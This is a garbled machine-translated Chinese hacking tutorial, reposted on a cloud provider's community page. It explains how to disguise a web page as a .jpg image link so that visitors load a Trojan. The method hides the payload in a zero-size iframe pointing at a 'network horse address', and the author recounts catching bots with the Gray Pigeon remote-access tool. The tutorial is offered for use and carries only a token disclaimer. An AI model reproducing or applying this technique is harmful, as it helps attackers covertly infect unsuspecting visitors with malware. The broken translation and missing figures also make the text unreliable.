Link behind the image

Source: Internet
Author: User

Solar-fly [S. N.T]

When I still don't know what the gray pigeon is, the net horse is very popular. When I finally know what the gray pigeon is, I am using the QQ Software to receive emails, when I successfully went online using the gray pigeon and caught the first zombie, all the bots were caught by the web horse ...... Are the technologies I have learned outdated? Later, when I became a big bird, I finally figured out the truth: "There are no outdated technologies, only outdated ideas "!
The following describes how to use outdated methods to reflect the value of technology. All I need is an image and a web environment.
First of all, to build a web environment, I am using a small tornado ASP server. It feels convenient and easy to operate. Unlike IIS, I need to restart the server again with a CD. Open the installer. 1. Click "Next". The default installation path is "C: Program Files little tornado AspWebServer". After installation, if we open 127.0.0.1 in IE browser and such a page as 2 appears, it means that the environment has been set up.

. Let's try again in IE browser.Http://up.2cto.com/Article/200904/20090427090150410.jpgWhat have you found? 4.

Now everyone should think about it. Let's add an image to index.html with the Code </img> and 5. Open this link againHttp://up.2cto.com/Article/200904/20090427090150410.jpgSee the picture, 6.

If there is no use value in this way, then we will add the trojan address, the code is <iframe src = "Network horse address" height = 0 width = 0> </iframe>, 7. Now, click your "image" address, and pay attention to the changes in the lower left corner of the page, 8.

Have you seen it? Jump to the directory, jump to the file, open the page, and only show the image. At this point, you should understand that we can use the default priority relationship in Html to conceal Trojans.
This is also a method of image spoofing. In this article, I will just give you a simple example, using the simplest framework to mount Trojans. The principle is the same: "A knife can kill people or save lives ."

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.